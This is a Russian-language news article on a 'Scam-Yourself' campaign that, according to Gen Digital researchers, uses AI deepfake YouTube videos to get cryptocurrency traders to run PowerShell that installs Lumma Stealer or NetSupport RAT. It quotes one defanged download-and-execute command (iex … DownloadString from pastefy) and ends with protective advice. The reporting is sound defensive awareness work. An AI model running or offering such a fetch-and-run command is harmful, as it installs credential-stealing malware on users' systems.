Киберпреступники запустили новую волну атак под названием «Scam-Yourself» («Самообман»), которые используют дипфейки, созданные искусственным интеллектом, и вредоносные скрипты для обмана пользователей. Эти атаки нацелены на энтузиастов криптовалют и финансовых трейдеров, представляя собой опасный скачок в развитии методов социальной инженерии.

Исследователи из компании Gen Digital обнаружили кампанию, которая использует YouTube-каналы, сгенерированных искусственным интеллектом людей и фейковые скрипты. Жертвы сами компрометируют свои системы, следуя инструкциям из видео, которые выглядят абсолютно легитимными.

Атаки растут в геометрической прогрессии

В третьем квартале 2024 года количество таких атак выросло на 614%. Это беспрецедентный скачок, который вызывает серьёзные опасения по поводу использования генеративного ИИ в киберпреступлениях.

Всё начинается с дипфейк-видео, размещённого на взломанном YouTube-канале с 110 000 подписчиков. В ролике появляется сгенерированный нейросетями персонаж — «Томас Харрис» или «Томас Робертс». Его создали с помощью технологий анимации лица, синтеза голоса и имитации движений тела.

Канал выглядит абсолютно достоверно: он использует контент с платформы TradingView, популярной среди трейдеров. Однако отсутствующее в плейлистах обучающее видео предлагает зрителям активировать фейковый «AI-powered developer mode» («режим разработчика с поддержкой ИИ»), который якобы предсказывает тренды криптовалютного рынка с точностью 97%.

Как работает атака?

Суть атаки заключается в использовании скриптов. Пользователям предлагается открыть диалог «Выполнить» (Win+R) в Windows и выполнить команду PowerShell, которая подхватывает вредоносный скрипт с файлообменников Pastefy[.]com или Obin[.]net.

Пример расшифрованного скрипта, предоставленного исследователями, показывает, что злоумышленники используют ChatGPT для улучшения своего кода:

iex (New-Object Net.WebClient).DownloadString('hxxps://pastefy[.]com/raw/AbCdE123')

Этот скрипт подключается к серверу управления, недавно замеченному под доменами developer-update[.]dev или developerbeta[.]dev, чтобы скачать и установить вредоносные программы, например Lumma Stealer или NetSupport Remote Access Tool.

Первая крадёт криптокошельки и данные браузера, а вторая предоставляет полный контроль над системой.

Как скрывается искусственная природа видео?

Дипфейк-видео маскирует свою искусственную природу через детализированные инструкции. Синтетический голос объясняет, как отключить «Защитник Windows», добавляя исключения в реестр. На экране демонстрируются нажатия клавиш, имитирующие подлинный рабочий процесс.

Злоумышленники увеличивают охват через систему спонсорской рекламы YouTube, нацеливаясь на пользователей, просматривающих реальный финансовый контент.

Чем эти атаки отличаются от классического фишинга?

В отличие от традиционного фишинга, где жертвы пассивно предоставляют данные, здесь они активно участвуют в собственной же компрометации. Пользователи верят, что получают эксклюзивные инструменты для анализа рынка, и сами запускают вредоносные программы.

Что делать для защиты?

С развитием автоматизации создания дипфейков и улучшения скриптов с помощью ИИ, проверка цифровых инструкций через несколько каналов становится обязательной практикой безопасности. Киберпреступники теперь могут генерировать убедительные дипфейки и рабочие скрипты быстрее, чем когда-либо, что делает эту угрозу особенно опасной.

Эксперты рекомендуют:

  • Не доверять инструкциям из непроверенных источников.
  • Использовать антивирусные программы и регулярно обновлять их.
  • Проверять подлинность YouTube-каналов и контента перед тем, как следовать инструкциям.
  • Включать многофакторную аутентификацию для защиты аккаунтов.

Киберпреступники продолжают совершенствовать свои методы, и только осведомлённость пользователей может помочь противостоять таким угрозам.

Ещё по теме: